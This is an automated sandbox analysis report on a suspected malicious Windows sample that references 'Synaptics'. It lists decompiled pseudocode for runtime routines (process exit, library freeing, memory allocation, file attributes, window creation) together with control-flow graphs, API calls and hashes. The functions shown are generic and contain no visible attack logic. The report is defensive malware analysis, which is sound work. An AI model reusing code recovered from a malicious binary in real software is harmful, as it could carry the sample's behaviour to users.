                                                                                                                                                                                          • Opcode Fuzzy Hash: c1566d8f6abf6d80f03d096eeda82e70b725eacd03a30ec4fb637c5d0c7dd738
                                                                                                                                                                                          • Instruction Fuzzy Hash: FEF02772F003202BEB3059AA4CC1B535AC49F857A4F194076FD08FF3E9D6B58C0142A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040484C Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 127 40484c-404863 128 404865-404868 127->128 129 40487b-404882 127->129 128->129 130 40486a-404879 128->130 131 404884-404890 call 404734 call 4047c0 129->131 132 404895-404899 129->132 130->129 131->132 133 4048a5-4048ae call 4045c4 132->133 134 40489b-40489e 132->134 143 4048b0-4048b3 133->143 144 4048b5-4048ba 133->144 134->133 137 4048a0-4048a2 134->137 137->133 143->144 145 4048d6-4048df call 40459c 143->145 144->145 146 4048bc-4048ca call 40653c 144->146 151 4048e1 145->151 152 4048e4-4048e8 145->152 146->145 153 4048cc-4048ce 146->153 151->152 154 4048ea call 404790 152->154 155 4048ef-4048f2 152->155 153->145 156 4048d0-4048d1 FreeLibrary 153->156 154->155 158 4048f4-4048fb 155->158 159 40490b 155->159 156->145 160 404903-404906 ExitProcess 158->160 161 4048fd 158->161 161->160
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E0040484C() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x0049E660 != 0 ||  *0x49e048 == 0) {
					L3:
					if( *0x49b004 != 0) {
						E00404734();
						E004047C0(_t32);
						 *0x49b004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x49e660)) == 2 &&  *0x49b000 == 0) {
							 *0x0049E644 = 0;
						}
						E004045C4(); // executed
						if( *((char*)(0x49e660)) <= 1 ||  *0x49b000 != 0) {
							_t14 =  *0x0049E648;
							if( *0x0049E648 != 0) {
								E0040653C(_t14);
								_t35 =  *((intOrPtr*)(0x49e648));
								_t7 = _t35 + 0x10; // 0x400000
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						E0040459C();
						if( *((char*)(0x49e660)) == 1) {
							 *0x0049E65C();
						}
						if( *((char*)(0x49e660)) != 0) {
							E00404790();
						}
						if( *0x49e638 == 0) {
							if( *0x49e028 != 0) {
								 *0x49e028();
							}
							ExitProcess( *0x49b000); // executed
						}
						memcpy(0x49e638,  *0x49e638, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x49b000 = 0x49b000;
					}
				} else {
					do {
						 *0x49e048 = 0;
						 *((intOrPtr*)( *0x49e048))();
					} while ( *0x49e048 != 0);
					goto L3;
				}
			}







                                                                                                                                                                                          0x00404863
                                                                                                                                                                                          0x0040487b
                                                                                                                                                                                          0x00404882
                                                                                                                                                                                          0x00404884
                                                                                                                                                                                          0x00404889
                                                                                                                                                                                          0x00404890
                                                                                                                                                                                          0x00404890
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404895
                                                                                                                                                                                          0x00404899
                                                                                                                                                                                          0x004048a2
                                                                                                                                                                                          0x004048a2
                                                                                                                                                                                          0x004048a5
                                                                                                                                                                                          0x004048ae
                                                                                                                                                                                          0x004048b5
                                                                                                                                                                                          0x004048ba
                                                                                                                                                                                          0x004048bc
                                                                                                                                                                                          0x004048c1
                                                                                                                                                                                          0x004048c4
                                                                                                                                                                                          0x004048c4
                                                                                                                                                                                          0x004048c7
                                                                                                                                                                                          0x004048ca
                                                                                                                                                                                          0x004048d1
                                                                                                                                                                                          0x004048d1
                                                                                                                                                                                          0x004048ca
                                                                                                                                                                                          0x004048ba
                                                                                                                                                                                          0x004048d6
                                                                                                                                                                                          0x004048df
                                                                                                                                                                                          0x004048e1
                                                                                                                                                                                          0x004048e1
                                                                                                                                                                                          0x004048e8
                                                                                                                                                                                          0x004048ea
                                                                                                                                                                                          0x004048ea
                                                                                                                                                                                          0x004048f2
                                                                                                                                                                                          0x004048fb
                                                                                                                                                                                          0x004048fd
                                                                                                                                                                                          0x004048fd
                                                                                                                                                                                          0x00404906
                                                                                                                                                                                          0x00404906
                                                                                                                                                                                          0x00404917
                                                                                                                                                                                          0x00404917
                                                                                                                                                                                          0x00404919
                                                                                                                                                                                          0x00404919
                                                                                                                                                                                          0x0040486a
                                                                                                                                                                                          0x0040486a
                                                                                                                                                                                          0x00404870
                                                                                                                                                                                          0x00404874
                                                                                                                                                                                          0x00404876
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040486a

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 004048D1
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 00404906
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitFreeLibraryProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1404682716-0
                                                                                                                                                                                          • Opcode ID: aace151720c6b04e09c8da3b3daabfaf2305c7a6b183d5e44d56bdc4e9efabf5
                                                                                                                                                                                          • Instruction ID: 8f7f5b5083db65be3b92a9b52f1338e088dbfa5033c12c2e4b8cbee57b0dbfcd
                                                                                                                                                                                          • Opcode Fuzzy Hash: aace151720c6b04e09c8da3b3daabfaf2305c7a6b183d5e44d56bdc4e9efabf5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 88217CFA900285AFEB20AF66848475777D1AF89314F24897B9A04A72C6D77CCCD0C75D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404844 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 162 404844-404863 164 404865-404868 162->164 165 40487b-404882 162->165 164->165 166 40486a-404879 164->166 167 404884-404890 call 404734 call 4047c0 165->167 168 404895-404899 165->168 166->165 167->168 169 4048a5-4048ae call 4045c4 168->169 170 40489b-40489e 168->170 179 4048b0-4048b3 169->179 180 4048b5-4048ba 169->180 170->169 173 4048a0-4048a2 170->173 173->169 179->180 181 4048d6-4048df call 40459c 179->181 180->181 182 4048bc-4048ca call 40653c 180->182 187 4048e1 181->187 188 4048e4-4048e8 181->188 182->181 189 4048cc-4048ce 182->189 187->188 190 4048ea call 404790 188->190 191 4048ef-4048f2 188->191 189->181 192 4048d0-4048d1 FreeLibrary 189->192 190->191 194 4048f4-4048fb 191->194 195 40490b 191->195 192->181 196 404903-404906 ExitProcess 194->196 197 4048fd 194->197 197->196
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E00404844() {
				intOrPtr* _t13;
				struct HINSTANCE__* _t27;
				void* _t36;
				intOrPtr _t39;
				void* _t52;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x0049E660 != 0 ||  *0x49e048 == 0) {
					L5:
					if( *0x49b004 != 0) {
						E00404734();
						E004047C0(_t36);
						 *0x49b004 = 0;
					}
					L7:
					if( *((char*)(0x49e660)) == 2 &&  *0x49b000 == 0) {
						 *0x0049E644 = 0;
					}
					E004045C4(); // executed
					if( *((char*)(0x49e660)) <= 1 ||  *0x49b000 != 0) {
						_t17 =  *0x0049E648;
						if( *0x0049E648 != 0) {
							E0040653C(_t17);
							_t39 =  *((intOrPtr*)(0x49e648));
							_t7 = _t39 + 0x10; // 0x400000
							_t27 =  *_t7;
							_t8 = _t39 + 4; // 0x400000
							if(_t27 !=  *_t8 && _t27 != 0) {
								FreeLibrary(_t27);
							}
						}
					}
					E0040459C();
					if( *((char*)(0x49e660)) == 1) {
						 *0x0049E65C();
					}
					if( *((char*)(0x49e660)) != 0) {
						E00404790();
					}
					if( *0x49e638 == 0) {
						if( *0x49e028 != 0) {
							 *0x49e028();
						}
						ExitProcess( *0x49b000); // executed
					}
					memcpy(0x49e638,  *0x49e638, 0xb << 2);
					_t52 = _t52 + 0xc;
					0x49b000 = 0x49b000;
					goto L7;
				} else {
					do {
						 *0x49e048 = 0;
						 *((intOrPtr*)( *0x49e048))();
					} while ( *0x49e048 != 0);
					goto L5;
				}
			}








                                                                                                                                                                                          0x00404846
                                                                                                                                                                                          0x00404863
                                                                                                                                                                                          0x0040487b
                                                                                                                                                                                          0x00404882
                                                                                                                                                                                          0x00404884
                                                                                                                                                                                          0x00404889
                                                                                                                                                                                          0x00404890
                                                                                                                                                                                          0x00404890
                                                                                                                                                                                          0x00404895
                                                                                                                                                                                          0x00404899
                                                                                                                                                                                          0x004048a2
                                                                                                                                                                                          0x004048a2
                                                                                                                                                                                          0x004048a5
                                                                                                                                                                                          0x004048ae
                                                                                                                                                                                          0x004048b5
                                                                                                                                                                                          0x004048ba
                                                                                                                                                                                          0x004048bc
                                                                                                                                                                                          0x004048c1
                                                                                                                                                                                          0x004048c4
                                                                                                                                                                                          0x004048c4
                                                                                                                                                                                          0x004048c7
                                                                                                                                                                                          0x004048ca
                                                                                                                                                                                          0x004048d1
                                                                                                                                                                                          0x004048d1
                                                                                                                                                                                          0x004048ca
                                                                                                                                                                                          0x004048ba
                                                                                                                                                                                          0x004048d6
                                                                                                                                                                                          0x004048df
                                                                                                                                                                                          0x004048e1
                                                                                                                                                                                          0x004048e1
                                                                                                                                                                                          0x004048e8
                                                                                                                                                                                          0x004048ea
                                                                                                                                                                                          0x004048ea
                                                                                                                                                                                          0x004048f2
                                                                                                                                                                                          0x004048fb
                                                                                                                                                                                          0x004048fd
                                                                                                                                                                                          0x004048fd
                                                                                                                                                                                          0x00404906
                                                                                                                                                                                          0x00404906
                                                                                                                                                                                          0x00404917
                                                                                                                                                                                          0x00404917
                                                                                                                                                                                          0x00404919
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040486a
                                                                                                                                                                                          0x0040486a
                                                                                                                                                                                          0x00404870
                                                                                                                                                                                          0x00404874
                                                                                                                                                                                          0x00404876
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040486a

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 004048D1
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 00404906
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitFreeLibraryProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1404682716-0
                                                                                                                                                                                          • Opcode ID: 21e905b02f2b03465b5a9f80233f0ae414486a0d2daa4ba7a7ebcfa5846c7405
                                                                                                                                                                                          • Instruction ID: 883b3613692aa30e866907f4332a392e5c305926fac8e5934d264d12186bf84f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 21e905b02f2b03465b5a9f80233f0ae414486a0d2daa4ba7a7ebcfa5846c7405
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F218CF5900285AFEB21AF6684847563BE1AF95314F1488BBDA04A62C6D37CDCD0CB5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404848 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 198 404848-404863 199 404865-404868 198->199 200 40487b-404882 198->200 199->200 201 40486a-404879 199->201 202 404884-404890 call 404734 call 4047c0 200->202 203 404895-404899 200->203 201->200 202->203 204 4048a5-4048ae call 4045c4 203->204 205 40489b-40489e 203->205 214 4048b0-4048b3 204->214 215 4048b5-4048ba 204->215 205->204 208 4048a0-4048a2 205->208 208->204 214->215 216 4048d6-4048df call 40459c 214->216 215->216 217 4048bc-4048ca call 40653c 215->217 222 4048e1 216->222 223 4048e4-4048e8 216->223 217->216 224 4048cc-4048ce 217->224 222->223 225 4048ea call 404790 223->225 226 4048ef-4048f2 223->226 224->216 227 4048d0-4048d1 FreeLibrary 224->227 225->226 229 4048f4-4048fb 226->229 230 40490b 226->230 227->216 231 404903-404906 ExitProcess 229->231 232 4048fd 229->232 232->231
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E00404848() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x0049E660 != 0 ||  *0x49e048 == 0) {
					L4:
					if( *0x49b004 != 0) {
						E00404734();
						E004047C0(_t35);
						 *0x49b004 = 0;
					}
					L6:
					if( *((char*)(0x49e660)) == 2 &&  *0x49b000 == 0) {
						 *0x0049E644 = 0;
					}
					E004045C4(); // executed
					if( *((char*)(0x49e660)) <= 1 ||  *0x49b000 != 0) {
						_t16 =  *0x0049E648;
						if( *0x0049E648 != 0) {
							E0040653C(_t16);
							_t38 =  *((intOrPtr*)(0x49e648));
							_t7 = _t38 + 0x10; // 0x400000
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x400000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E0040459C();
					if( *((char*)(0x49e660)) == 1) {
						 *0x0049E65C();
					}
					if( *((char*)(0x49e660)) != 0) {
						E00404790();
					}
					if( *0x49e638 == 0) {
						if( *0x49e028 != 0) {
							 *0x49e028();
						}
						ExitProcess( *0x49b000); // executed
					}
					memcpy(0x49e638,  *0x49e638, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x49b000 = 0x49b000;
					goto L6;
				} else {
					do {
						 *0x49e048 = 0;
						 *((intOrPtr*)( *0x49e048))();
					} while ( *0x49e048 != 0);
					goto L4;
				}
			}







                                                                                                                                                                                          0x00404863
                                                                                                                                                                                          0x0040487b
                                                                                                                                                                                          0x00404882
                                                                                                                                                                                          0x00404884
                                                                                                                                                                                          0x00404889
                                                                                                                                                                                          0x00404890
                                                                                                                                                                                          0x00404890
                                                                                                                                                                                          0x00404895
                                                                                                                                                                                          0x00404899
                                                                                                                                                                                          0x004048a2
                                                                                                                                                                                          0x004048a2
                                                                                                                                                                                          0x004048a5
                                                                                                                                                                                          0x004048ae
                                                                                                                                                                                          0x004048b5
                                                                                                                                                                                          0x004048ba
                                                                                                                                                                                          0x004048bc
                                                                                                                                                                                          0x004048c1
                                                                                                                                                                                          0x004048c4
                                                                                                                                                                                          0x004048c4
                                                                                                                                                                                          0x004048c7
                                                                                                                                                                                          0x004048ca
                                                                                                                                                                                          0x004048d1
                                                                                                                                                                                          0x004048d1
                                                                                                                                                                                          0x004048ca
                                                                                                                                                                                          0x004048ba
                                                                                                                                                                                          0x004048d6
                                                                                                                                                                                          0x004048df
                                                                                                                                                                                          0x004048e1
                                                                                                                                                                                          0x004048e1
                                                                                                                                                                                          0x004048e8
                                                                                                                                                                                          0x004048ea
                                                                                                                                                                                          0x004048ea
                                                                                                                                                                                          0x004048f2
                                                                                                                                                                                          0x004048fb
                                                                                                                                                                                          0x004048fd
                                                                                                                                                                                          0x004048fd
                                                                                                                                                                                          0x00404906
                                                                                                                                                                                          0x00404906
                                                                                                                                                                                          0x00404917
                                                                                                                                                                                          0x00404917
                                                                                                                                                                                          0x00404919
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040486a
                                                                                                                                                                                          0x0040486a
                                                                                                                                                                                          0x00404870
                                                                                                                                                                                          0x00404874
                                                                                                                                                                                          0x00404876
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040486a

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 004048D1
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 00404906
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitFreeLibraryProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1404682716-0
                                                                                                                                                                                          • Opcode ID: d546d851f69e48fd9f4b53ba4d22cf809c9b4c72d8268e3f297f4199c42bff18
                                                                                                                                                                                          • Instruction ID: 9fe47824b19111ae0d82b188d774791a2e79eaf21524d9292fd64a79079edc68
                                                                                                                                                                                          • Opcode Fuzzy Hash: d546d851f69e48fd9f4b53ba4d22cf809c9b4c72d8268e3f297f4199c42bff18
                                                                                                                                                                                          • Instruction Fuzzy Hash: 87216DF5900285AFEB20AF66C48475677E1AF95314F14887B9A04A62C6D37CDCD0CB5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401748 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 54memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 233 401748-40178c 234 4017ca-4017d0 233->234 235 4017d2-4017d9 234->235 236 40178e-401798 234->236 237 40179a 236->237 238 40179c-4017a0 236->238 237->238 239 4017a2 238->239 240 4017a6-4017a8 238->240 239->240 241 4017c8 240->241 242 4017aa-4017bc VirtualAlloc 240->242 241->234 242->241 243 4017be-4017c6 242->243 243->235
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00401748(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x49e5ec; // 0x49e5ec
				while(_t29 != 0x49e5ec) {
					_t7 = _t29 + 8; // 0x0
					_t17 =  *_t7;
					_t8 = _t29 + 0xc; // 0x0
					_t27 =  *_t8 + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                                                                                                                                                                          0x0040174f
                                                                                                                                                                                          0x00401753
                                                                                                                                                                                          0x0040175a
                                                                                                                                                                                          0x0040176f
                                                                                                                                                                                          0x00401777
                                                                                                                                                                                          0x0040177d
                                                                                                                                                                                          0x00401783
                                                                                                                                                                                          0x00401786
                                                                                                                                                                                          0x004017ca
                                                                                                                                                                                          0x0040178e
                                                                                                                                                                                          0x0040178e
                                                                                                                                                                                          0x00401791
                                                                                                                                                                                          0x00401794
                                                                                                                                                                                          0x00401798
                                                                                                                                                                                          0x0040179a
                                                                                                                                                                                          0x0040179a
                                                                                                                                                                                          0x004017a0
                                                                                                                                                                                          0x004017a2
                                                                                                                                                                                          0x004017a2
                                                                                                                                                                                          0x004017a8
                                                                                                                                                                                          0x004017b5
                                                                                                                                                                                          0x004017bc
                                                                                                                                                                                          0x004017be
                                                                                                                                                                                          0x004017c4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004017c4
                                                                                                                                                                                          0x004017bc
                                                                                                                                                                                          0x004017c8
                                                                                                                                                                                          0x004017c8
                                                                                                                                                                                          0x004017d9

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 004017B5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                          • String ID: I
                                                                                                                                                                                          • API String ID: 4275171209-1966777607
                                                                                                                                                                                          • Opcode ID: a7729a2a40d84c19509578ac64f8ad731e2a19a7efc197d915124daa5f5ca19a
                                                                                                                                                                                          • Instruction ID: d74b7ebcb609947181d21bffa9b817de474e90391ed7449ce6f0c7caa409c1d9
                                                                                                                                                                                          • Opcode Fuzzy Hash: a7729a2a40d84c19509578ac64f8ad731e2a19a7efc197d915124daa5f5ca19a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 16117C76A04705ABC310DF29C880A2BBBE5EBC4764F15C53EE598A73A4E734AC408A49
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409A8E Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 244 409a8e-409aa9 call 404e80 SetFileAttributesA 247 409ab2-409ab7 244->247 248 409aab-409ab0 GetLastError 244->248 248->247
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00409A8E(void* __eax, long __edx) {
				int _t4;
				long _t8;

				_t8 = 0;
				_t4 = SetFileAttributesA(E00404E80(__eax), __edx); // executed
				if(_t4 == 0) {
					_t8 = GetLastError();
				}
				return _t8;
			}





                                                                                                                                                                                          0x00409a97
                                                                                                                                                                                          0x00409aa2
                                                                                                                                                                                          0x00409aa9
                                                                                                                                                                                          0x00409ab0
                                                                                                                                                                                          0x00409ab0
                                                                                                                                                                                          0x00409ab7

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(00000000), ref: 00409AA2
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 00409AAB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesErrorFileLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1799206407-0
                                                                                                                                                                                          • Opcode ID: b379b3c1d2c4bdec39d391bc63995b670dc69aae600430fb5eefc61aa5439088
                                                                                                                                                                                          • Instruction ID: 73d5e6bfd43123de77bef711c5867b11173ba462ac631d8ad98c49c91208dbde
                                                                                                                                                                                          • Opcode Fuzzy Hash: b379b3c1d2c4bdec39d391bc63995b670dc69aae600430fb5eefc61aa5439088
                                                                                                                                                                                          • Instruction Fuzzy Hash: 69D0C9627051202BA71065FF2C8196B81CD8FD55A9301427FBA08E3292E568DC0A01BA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407A8A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 263 407a8a-407ad4 call 402c0c CreateWindowExA call 402bfc 267 407ad9-407ae0 263->267
                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                          			E00407A8A(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				CHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				CHAR* _t31;
				long _t38;

				_push(_t31);
				_v8 = _t31;
				_t38 = __eax;
				_t13 = E00402C0C();
				_t24 = CreateWindowExA(_t38, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00402BFC(_t13);
				return _t24;
			}








                                                                                                                                                                                          0x00407a8f
                                                                                                                                                                                          0x00407a93
                                                                                                                                                                                          0x00407a98
                                                                                                                                                                                          0x00407a9a
                                                                                                                                                                                          0x00407acb
                                                                                                                                                                                          0x00407ad4
                                                                                                                                                                                          0x00407ae0

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
